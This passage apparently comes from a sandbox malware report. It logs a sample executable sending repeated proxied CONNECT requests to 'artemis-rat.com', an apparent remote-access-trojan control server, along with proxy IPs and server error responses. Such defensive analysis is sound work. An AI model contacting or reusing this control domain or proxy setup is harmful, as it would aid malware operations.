                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.014198065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.595834970 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:09.411199093 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.043149948 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:26.307045937 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:49.603123903 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            177192.168.2.55030720.219.182.5931293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.397371054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.791773081 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            178192.168.2.549761161.97.163.52641093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.397419930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.514318943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            179192.168.2.55036851.178.231.3480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.397898912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            180192.168.2.550464172.67.182.60803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.398544073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.553944111 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            181192.168.2.55044245.196.151.9754323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.402801991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.620161057 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            182192.168.2.55043092.204.134.38597273876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.402803898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.936080933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.639250994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202007055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092679024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905369043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702076912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.405136108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


